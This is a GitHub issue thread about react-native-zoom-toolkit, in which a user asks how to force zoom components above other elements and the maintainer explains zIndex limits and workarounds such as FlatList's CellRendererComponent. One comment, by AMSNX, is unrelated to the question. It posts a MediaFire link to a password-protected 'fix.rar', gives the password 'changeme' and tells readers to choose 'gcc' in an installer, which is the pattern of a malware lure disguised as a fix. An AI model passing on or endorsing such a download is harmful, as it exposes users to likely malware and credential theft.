### ISSUE TITLE
[Question]: Option to force overlay

### ISSUE THREAD

**Issue by frozencap** [Glazzes/react-native-zoom-toolkit#54]
### Summary

Hi is there an option to force the components to overlay, as in force them to be at the "top zIndex"?

Currently having to fiddle around with `overflow: 'visible' | 'hidden'` in the parents

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Glazzes** [comment]
Hi there, I didn't really get what you mean, do you mean something like the video seen [here](https://glazzes.github.io/react-native-zoom-toolkit/components/snapbackzoom.html)?

**Comment by zawesh** [comment]
Yes, exactly.

**Comment by frozencap** [comment]
Yes, exactly.

**Comment by Glazzes** [comment]
@frozencap When I was creating this library that was one of the very frist things I thought off, however there's no way to bypass the zIndex parent-child relationship, so such property never made it to the lib.

Sadly you have to find your way around this, mainly rendering all elements at the same level of nesting helps.

**Comment by frozencap** [comment]
surely it is possible with a custom context provider/portal 

will take a stab at it and report back

**Comment by Glazzes** [comment]
I did not say it was not possible, I linked you to a video where you can see it actually is as it belongs to the example app, what I meant is there's not way to bypass the zIndex restriction just by updating the zIndex.

It basically requires all sibling elements of the zoom component to lower its zIndex and for the zoom component parent container to set zIndex to a very high value, in case you rendering a list or something Flatlist's `CellRendererComponent` property is your friend to achieve such goal.
